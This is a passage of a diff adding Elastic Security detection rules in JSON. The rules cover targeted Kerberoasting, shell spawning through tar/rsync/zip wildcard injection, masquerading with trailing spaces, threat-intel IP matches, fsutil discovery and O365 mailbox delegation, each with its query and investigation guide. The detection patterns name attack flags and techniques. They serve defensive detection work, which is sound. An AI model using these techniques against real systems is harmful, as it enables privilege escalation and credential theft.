[here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have write privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged. Domain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same security standards as computer accounts (which have long, complex, random passwords that change frequently), exposing them to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Directory Service Changes\" and event.code:5136 and\n winlog.event_data.OperationType:\"%%14674\" and\n winlog.event_data.ObjectClass:\"user\" and\n winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", + "references": [ + "https://www.thehacker.recipes/ad/movement/access-controls/targeted-kerberoasting", + "https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/", + "https://www.thehacker.recipes/ad/movement/kerberos/kerberoast", + "https://attack.stealthbits.com/cracking-kerberos-tgs-tickets-using-kerberoasting", + "https://adsecurity.org/?p=280", + "https://github.com/OTRF/Set-AuditRule" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OperationType", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json new file mode 100644 index 00000000000..b6fb9caacab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Shell via Wildcard Injection Detected", + "query": "sequence by host.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"tar\" and process.args : \"--checkpoint=*\" and process.args : \"--checkpoint-action=*\") or\n (process.name == \"rsync\" and process.args : \"-e*\") or\n (process.name == \"zip\" and process.args == \"--unzip-command\") )] by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.name : (\"tar\", \"rsync\", \"zip\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.parent.entity_id\n", + "references": [ + "https://www.exploit-db.com/papers/33930" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0b803267-74c5-444d-ae29-32b5db2d562a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "0b803267-74c5-444d-ae29-32b5db2d562a_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json new file mode 100644 index 00000000000..d27c958c23b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify instances where adversaries include trailing space characters to mimic regular files, disguising their activity to evade default file handling mechanisms.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Processes with Trailing Spaces", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name : \"* \"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c093569-dff9-42b6-87b1-0242d9f7d9b4", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.006", + "name": "Space after Filename", + "reference": "https://attack.mitre.org/techniques/T1036/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "0c093569-dff9-42b6-87b1-0242d9f7d9b4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json new file mode 100644 index 00000000000..838518e7c1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when an IP address indicator from the Threat Intel Filebeat module or integrations has a match against a network event.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "packetbeat-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel IP Address Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "source.ip:* or destination.ip:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 99, + "rule_id": "0c41e478-5263-4c69-8f9e-7dfd2c22da64", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "source.ip", + "type": "mapping", + "value": "threat.indicator.ip" + } + ] + }, + { + "entries": [ + { + "field": "destination.ip", + "type": "mapping", + "value": "threat.indicator.ip" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "0c41e478-5263-4c69-8f9e-7dfd2c22da64_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json new file mode 100644 index 00000000000..f7a88d8de9d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Peripheral Device Discovery", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to the computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable media. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage services.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1120", + "name": "Peripheral Device Discovery", + "reference": "https://attack.mitre.org/techniques/T1120/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json new file mode 100644 index 00000000000..eebb76d47f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Peripheral Device Discovery", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to the computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable media. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage services.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1120", + "name": "Peripheral Device Discovery", + "reference": "https://attack.mitre.org/techniques/T1120/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json new file mode 100644 index 00000000000..58735bf3432 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": 